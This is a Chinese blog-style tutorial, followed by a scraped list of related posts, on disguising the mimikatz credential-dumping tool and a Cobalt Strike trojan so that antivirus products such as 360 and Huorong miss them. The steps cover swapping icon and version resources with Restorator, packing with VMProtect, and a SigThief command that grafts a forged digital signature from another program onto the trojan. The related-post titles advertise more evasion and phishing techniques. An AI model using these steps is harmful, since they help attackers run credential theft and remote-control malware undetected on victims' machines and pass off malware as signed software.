目录

免杀准备工具:

一、免杀mimikatz

二、免杀CS

web安全学习了解:web渗透测试

官网:宣紫科技

免杀准备工具:

Restorator
SigThief
VMProtect壳

一、免杀mimikatz

准备工具:mimikatz
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。)

将原有的图标及版本资源删除后拖入附带资源的图标及版本。保存mimikatz。

简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。

成功绕过火绒,此处壳需要注意最好购买定期跟随官方一起更新。

二、免杀CS

准备工具:CS客户端
使用cs生成木马后,与免杀mimikatz同样选择资源。

替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。使用SigThief

sigthief.py -i 软件文件名 -t 木马文件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。在该基础上继续加壳即可免杀。

实用cs、mimikatz免杀virscan相关推荐

  1. mimikatz免杀过360和火绒

    mimikatz mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取名闻密码和NTLM哈希值的工具,攻击者可以利用这种功能漫游内网.也可以通过明文密码或者hash值 ...

  2. Flash钓鱼->CS上线(免杀过火绒、360等)

    先看结果 访问钓鱼页面: 点击立即升级即把马儿下载下来了 这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了 双击运行,查看效果: 首先CS是没东西 ...

  3. 艰难的mimikatz源码编译免杀 Windows Defender

    微信公众号:乌鸦安全 扫取二维码获取更多信息! 说明 本文周一的时候,工具就已经上传GitHub了,所以工具应该是已经失效了!!!仅供参考! 本文mimikatz源码编译未能免杀Windows Def ...

  4. 利用Ladon实现C2免杀所有杀软

    前言 写了几篇无回显命令执行漏洞Ladon回显方法,接下来我们它升级,既然我们可以通过漏洞执行无回显命令都可以得到回显,那么我们自己写的程序不是更轻而易举吗?所谓远控不过就是通过各种协议传输攻击者的操 ...

  5. 远控免杀专题文章(1)-基础篇

    脉搏文库 TideSec [](javascript:void(0)) 2020-02-20 6,218 *前**言* 一直是从事web安全多一些,对waf绕过还稍微有些研究,但是对远控免杀的认知还大 ...

  6. 红队免杀培训第一章-不可执行的shellcode

    临近全国hw,后面会陆续推出红队免杀培训文章,希望能到诸君能在赛场上乱免,不会把现成的加载器放出来,但是例子改一下就是一个好的加载器,强调一遍,免杀并不是一种技术的一支独秀,而是百花齐放! 前言: ​ ...

  7. 内网渗透-常用工具免杀

    内网渗透-常用工具免杀 Mimikatz免杀 Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证.票证传递.hash传递.甚至伪造域管理凭证令牌等诸多功能.由于mimikatz的使用说明网 ...

  8. 052 木马免杀全攻略

    木马免杀全攻略 转载自:a1pass.blog.163.com 2007-12-07 14:02:24| 分类: 思绪燃星火--技 | 标签:黑客 杂志刊物 作者:A1Pass 出处:http://a ...

  9. 钓鱼篇-利用RLO隐藏exe文件捆绑office免杀-远程模板加载上线CS

    RLO伪装图片执行 利用msf生成木马x.exe msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.96.128 LPORT=4444 ...

最新文章

  1. linux系统开机报错,linux开机报错故障
  2. 【Groovy】MOP 元对象协议与元编程 ( 使用 Groovy 元编程进行函数拦截 | 重写 MetaClass#invokeMethod 方法拦截 JDK 中已经定义的函数 )
  3. 微信跳转手机默认浏览器打开的实现方式
  4. 终极Java日志字典:开发人员最常记录的单词是什么?
  5. selenium学习过程中遇到的问题
  6. 玩嗨的 2 亿快手“老铁”和幕后的极致视觉算法
  7. 如何在vue项目中使用md5加密
  8. 联想ghost重装系统_【一键ghost装系统教程】一键ghost重装系统_一键ghost安装教程...
  9. 「管理数学基础」1.4 矩阵理论:相似矩阵
  10. web前端知识——常见布局方案、文章排版、图片排版、某宝列表
  11. 域名未授权 / 该网站未授权,禁止使用 解决办法:
  12. 树莓派学习笔记——串口与摄像头
  13. Python 一键导出微信阅读记录和笔记!
  14. 鸿蒙喜欢吃什么,巴西龟吃什么食物,一般一天喂几次?
  15. 小白算法积累——单链表6#带头结点单链表+递增有序
  16. Python 3 条件判断和循环语句,list、tuple、dict、set容器,部分函数
  17. 2023第十届大唐杯省赛心得体会总结
  18. Python全栈 Web(Django框架、模板继承、模型)
  19. 基于matlab_simulink的捷联惯性导航系统仿真,基于MATLABSimulink的捷联惯性导航仿真.pdf...
  20. 阿里云访问不到网站问题

热门文章

  1. Geospatial
  2. android app初始化sdk,Android SDK使用系列教程——2.SDK初始化和常用类介绍
  3. 2020年 Moore majority vote algorithm 摩尔投票法知多少
  4. 词云python_如何建立关键字词库,怎么增加网站关键词库?
  5. ECharts合并地图上的区域(济南市合并莱芜市)
  6. 极简魔力赏模拟器,戒掉魔力赏!(池子为苹果手机的)
  7. 生理周期python
  8. 【MySQL】MySQL启库失败故障处理两则
  9. 聚酞菁钴(CoPPc)磺化酞菁钴 聚酞菁钴CAS: 1154579-82-4
  10. pdm图纸管理系统可以实现哪些功能